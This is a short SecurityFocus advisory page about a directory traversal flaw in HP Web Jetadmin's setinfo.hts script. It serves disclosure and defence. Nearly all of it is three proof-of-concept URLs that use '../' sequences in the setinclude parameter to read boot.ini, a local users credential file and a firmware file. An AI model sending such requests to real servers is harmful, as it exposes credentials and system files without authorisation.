Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability

No exploit is required.

The following proof of concept has been provided:
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc







 

Privacy Statement
Copyright 2009, SecurityFocus